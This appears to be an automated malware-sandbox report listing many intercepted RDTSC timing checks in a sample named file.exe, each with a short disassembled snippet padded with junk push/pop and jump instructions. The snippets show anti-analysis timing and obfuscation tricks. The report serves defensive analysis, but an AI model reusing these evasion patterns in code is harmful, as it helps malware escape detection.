                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF85A4 second address: BF85C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 ja 00007EFD6CF3F37Eh 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BF85C0 second address: BF85C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BFBA87 second address: BFBA91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007EFD6CF3F376h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BFBA91 second address: BFBAC0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD6CDBF89Dh 0x00000007 jmp 00007EFD6CDBF8A8h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 push edi 0x00000013 pop edi 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BFBAC0 second address: BFBAC4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BFB269 second address: BFB26F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BFB26F second address: BFB28F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD6CF3F380h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a pushad 0x0000000b popad 0x0000000c pop edi 0x0000000d push eax 0x0000000e push edx 0x0000000f jo 00007EFD6CF3F376h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C01D41 second address: C01D4A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C01EBB second address: C01ED8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD6CF3F384h 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C02045 second address: C0204A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C028F7 second address: C028FC instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C028FC second address: C02902 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C02902 second address: C02918 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007EFD6CF3F37Fh 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C02918 second address: C0291C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0291C second address: C02936 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a js 00007EFD6CF3F37Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C02936 second address: C0293A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0293A second address: C02951 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD6CF3F381h 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C033C2 second address: C033C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0365A second address: C03660 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0DBC2 second address: C0DBDE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007EFD6CDBF8A8h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0DBDE second address: C0DBE2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0CEC2 second address: C0CECC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007EFD6CDBF896h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0CECC second address: C0CED2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0D333 second address: C0D366 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFD6CDBF89Dh 0x00000009 jmp 00007EFD6CDBF8A3h 0x0000000e popad 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 jne 00007EFD6CDBF896h 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0D366 second address: C0D378 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFD6CF3F37Eh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0D378 second address: C0D38A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jbe 00007EFD6CDBF896h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0D38A second address: C0D38E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0D645 second address: C0D675 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD6CDBF8A4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007EFD6CDBF8A4h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C0D8F3 second address: C0D8F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C14E8B second address: C14E91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C14E91 second address: C14EAB instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007EFD6CF3F382h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C14EAB second address: C14EB5 instructions: 0x00000000 rdtsc 0x00000002 js 00007EFD6CDBF896h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C14EB5 second address: C14EBB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C152BC second address: C152C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C152C0 second address: C152D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007EFD6CF3F376h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C152D0 second address: C152EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFD6CDBF8A7h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C14064 second address: C1406B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C19FBC second address: C19FC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C19FC0 second address: C19FC6 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C1D968 second address: C1D97B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007EFD6CDBF89Bh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C1D97B second address: C1D981 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C1D981 second address: C1D988 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C1D988 second address: C1D98E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C2407A second address: C240A0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 js 00007EFD6CDBF896h 0x0000000b push ecx 0x0000000c pop ecx 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007EFD6CDBF8A6h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C240A0 second address: C240B0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD6CF3F37Ch 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C2F36C second address: C2F370 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C2F370 second address: C2F3A8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD6CF3F384h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007EFD6CF3F380h 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007EFD6CF3F37Eh 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C2F037 second address: C2F049 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jc 00007EFD6CDBF896h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C2F049 second address: C2F04D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C2F04D second address: C2F05C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD6CDBF89Bh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C2F05C second address: C2F071 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push esi 0x00000008 jmp 00007EFD6CF3F37Ah 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C31808 second address: C3180E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C3180E second address: C3182A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jnl 00007EFD6CF3F376h 0x0000000c jmp 00007EFD6CF3F37Eh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C3182A second address: C3182F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C3182F second address: C31853 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop edi 0x00000006 jng 00007EFD6CF3F392h 0x0000000c jmp 00007EFD6CF3F386h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C366AC second address: C366B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C366B2 second address: C366C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFD6CF3F37Ch 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4534D second address: C45351 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C45351 second address: C45363 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jp 00007EFD6CF3F376h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pop eax 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C45363 second address: C45367 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C45367 second address: C4536B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C455F8 second address: C455FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C46600 second address: C46606 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4D3AE second address: C4D3D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFD6CDBF89Dh 0x00000009 jmp 00007EFD6CDBF8A5h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4D3D6 second address: C4D3DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C4D05E second address: C4D070 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD6CDBF89Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C574CC second address: C574D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C574D4 second address: C574D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C574D8 second address: C57504 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 pushad 0x0000000a popad 0x0000000b pop edi 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push ecx 0x00000013 pop ecx 0x00000014 jmp 00007EFD6CF3F388h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C57504 second address: C57514 instructions: 0x00000000 rdtsc 0x00000002 jp 00007EFD6CDBF896h 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f pop esi 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C57514 second address: C57518 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C57518 second address: C5751E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5751E second address: C5752E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007EFD6CF3F376h 0x0000000a jnc 00007EFD6CF3F376h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5DAFD second address: C5DB09 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007EFD6CDBF896h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5DB09 second address: C5DB0D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5DB0D second address: C5DB11 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C600DE second address: C600E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007EFD6CF3F376h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C600E8 second address: C60135 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD6CDBF8A0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a pushad 0x0000000b jmp 00007EFD6CDBF89Ah 0x00000010 jmp 00007EFD6CDBF8A5h 0x00000015 pushad 0x00000016 jmp 00007EFD6CDBF8A5h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C5C4DB second address: C5C4E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6C19D second address: C6C1A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007EFD6CDBF896h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C6F7EA second address: C6F7F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7E5F4 second address: C7E607 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007EFD6CDBF89Fh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7E607 second address: C7E60B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7E60B second address: C7E613 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7E613 second address: C7E61D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007EFD6CF3F376h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7E61D second address: C7E621 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7E745 second address: C7E753 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jbe 00007EFD6CF3F376h 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7E753 second address: C7E764 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD6CDBF89Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7ECEB second address: C7ECF1 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7EE34 second address: C7EE38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7EE38 second address: C7EE3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7EE3E second address: C7EE48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7EE48 second address: C7EE4E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C7EE4E second address: C7EE66 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007EFD6CDBF8A4h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C81F48 second address: C81F4D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8201F second address: C82023 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C82254 second address: C82258 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C82258 second address: C8225C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C82494 second address: C824CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007EFD6CF3F376h 0x0000000a popad 0x0000000b popad 0x0000000c mov dword ptr [esp], eax 0x0000000f mov dword ptr [ebp+122D24D3h], ebx 0x00000015 push dword ptr [ebp+124567A5h] 0x0000001b mov dword ptr [ebp+122D285Dh], edi 0x00000021 mov edx, dword ptr [ebp+122D2A79h] 0x00000027 push B6C3C54Dh 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f jnc 00007EFD6CF3F376h 0x00000035 push esi 0x00000036 pop esi 0x00000037 popad 0x00000038 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C8372F second address: C83735 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C83735 second address: C8373C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EA0436 second address: 4EA043C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EA043C second address: 4EA04A3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, CFD8h 0x00000007 jmp 00007EFD6CF3F381h 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f xchg eax, ebp 0x00000010 jmp 00007EFD6CF3F37Eh 0x00000015 mov ebp, esp 0x00000017 jmp 00007EFD6CF3F380h 0x0000001c pop ebp 0x0000001d pushad 0x0000001e pushfd 0x0000001f jmp 00007EFD6CF3F37Eh 0x00000024 jmp 00007EFD6CF3F385h 0x00000029 popfd 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EA04A3 second address: 4EA04A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4EA0506 second address: 4EA051B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007EFD6CF3F381h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
